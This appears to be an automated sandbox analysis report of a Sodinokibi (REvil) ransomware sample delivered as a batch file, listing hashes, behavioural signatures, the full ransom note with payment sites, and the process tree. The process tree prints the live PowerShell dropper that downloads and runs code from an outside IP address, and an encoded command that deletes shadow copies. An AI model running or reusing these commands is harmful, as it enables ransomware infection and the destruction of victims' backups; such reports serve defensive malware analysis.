Resubmissions

04-08-2020 12:18

200804-9zl3nv2v7e 10

03-08-2020 09:10

200803-27npjeedce 10

Analysis

  • max time kernel
    135s
  • max time network
    157s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    04-08-2020 12:18

General

  • Target

    0114183087da12ff757505a2a13eadf3.bat

  • Size

    221B

  • MD5

    0037a823920b7141736a18b53ea6858f

  • SHA1

    6632e28571b04910e97f9305a13b57ea06ff09a4

  • SHA256

    af6f3062596268dda5ce47e9bf6315f59cfa76b7aaaa809a76f6bdd69b4a6593

  • SHA512

    39f35183c367850e5e63b63c1a6dc176498d5a80afb4b5314f8df7ac63f9b50519d76783cbc47e42068d54eee860d14515cbd6619f41c3061b9cde0b76e31a07

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/0114183087da12ff757505a2a13eadf3

Extracted

Path

C:\xwrf360-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension xwrf360. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/9B3215501D5403EC 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/9B3215501D5403EC Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 3qVehtjYn4nLl5sM0WaWhVuVWj4Nj/mMiaOtQ06wvY6XGLnK9Ds+PA2d4SxpDxpU UHm2DA7A4Cid+x42KyJ9drOzawmOxEEs2VofFCpuXV01MR7xCGhl99HvhrvG5YAk JyGU7zUNPQ1KSycvuZzfVz8mxvamKF48KdbRJT4CR0VfLYpGdj4VIXLedWHNduHh BMOl3KBefk4K6lVzmquNjVFHXZEVlX4KQn+QmMYz6tVjKLt9Ej1J5Kgcp8H2NT1S VDvwS2xJ/HRaYxueU16g4fcN1ZFwZoAaboIkbKc0bf5FfIrVoQRbrz9cxClRlt7h M09LKvxc8hZ/5O3ZqEQEa3rtMVjM0wNmXxRnerk6zaSZfyif30ymeZsGbuvvaNuT eDfB4pp8hKqJFzkO25hwEWFZ4uhFyctGppHrLaqdWCfahth5d/Oxx3upxollzP0f Ia/JJ9UcdM1Y8dhqEqKycTeDFYL7xd1g77NWWgybWd4Wcjk6QDKRCEKRa/ySSE7k XSNEsk3iAqgNDD+CKJsHUbxWVQwup0SM0pavR7Z79TZopI2N8Mx6gFUnyh+R9GTB tJTuMRId2wIXgMGgrUjiyrTURdxNa/51SSTFHGDXFgi+2KBxvTkIe5NkYCfhg/wy 5bprvsA4Hf/L05Yhe3BBvI8Ij7/MUfdv0oTSwksT8m3l7ZMzrsvfTFj9RuyNBCCk 48zGSrg0Gc2lRm3vzVmX0Kz2e5EQKP/zrSaX1D3WG9A7cJRDP4QZMIHCrvrpwL0+ mqXRspCkm+FxUlmWpMoJGIS+3kNEM4pnxr4qKWialHjJB3yIEiRbAiQL7Bh65YOv 8FuvUvQg+COEslJ/qjAIdCRUetNZ+E9bBAgVkdig/4FQNS5RV4ZLKgK22iWbuQCd N7wBYCfNeWhokcajapIjKFVYGWvgGFgchf4LFUeS14A225pinhpcRniqbI1bdkTT IENN098BMVCLDCIsLLJS0Kxi5XQY2jtfff3AGPkIKs3BwX30T8gYsMmOBDy/Sg0+ RTIXA9UR1T/OjFdty5nm7lC/x+fE+P+LDZ0Y0AqQv4FL3b2HE8+TeqB0qO3SAP2C j9NsQjn2Q9dtT5pzUu2oQC9kWMLOAqLr+Ib/cfP0u5tTUS0yb9H9QKq6oSUfvlcP edIhjSe09H0zUreaZxnXawswZZyPBP5yIYDi7OmuhA80Pv5eYXVyufdFZ4Npe3Vy ko1ppwuXt2R80xFU2Io8crauxNW7p4QEP2Z/MPOmYPk7rFwsu7Ta3ysHWJ5qNl9p PM8jD/uk4nqd07aVAwgdi+ZgVxyVmia0J9CeQGWgb6QGJA== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/9B3215501D5403EC

http://decryptor.cc/9B3215501D5403EC

Signatures

  • Modifies service 2 TTPs 4 IoCs
  • Drops file in Program Files directory 30 IoCs
  • Modifies extensions of user files 9 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 110 IoCs
  • Enumerates connected drives 3 TTPs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 12 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Drops file in System32 directory 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\0114183087da12ff757505a2a13eadf3.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1492
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/0114183087da12ff757505a2a13eadf3');Invoke-LMLCRVJXBWONTA;Start-Sleep -s 10000"
      2⤵
      • Drops file in Program Files directory
      • Modifies extensions of user files
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Sets desktop wallpaper using registry
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      • Drops file in System32 directory
      PID:892
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1480
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1860

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

  • memory/892-0-0x0000000000000000-mapping.dmp

  • memory/1480-3-0x0000000000000000-mapping.dmp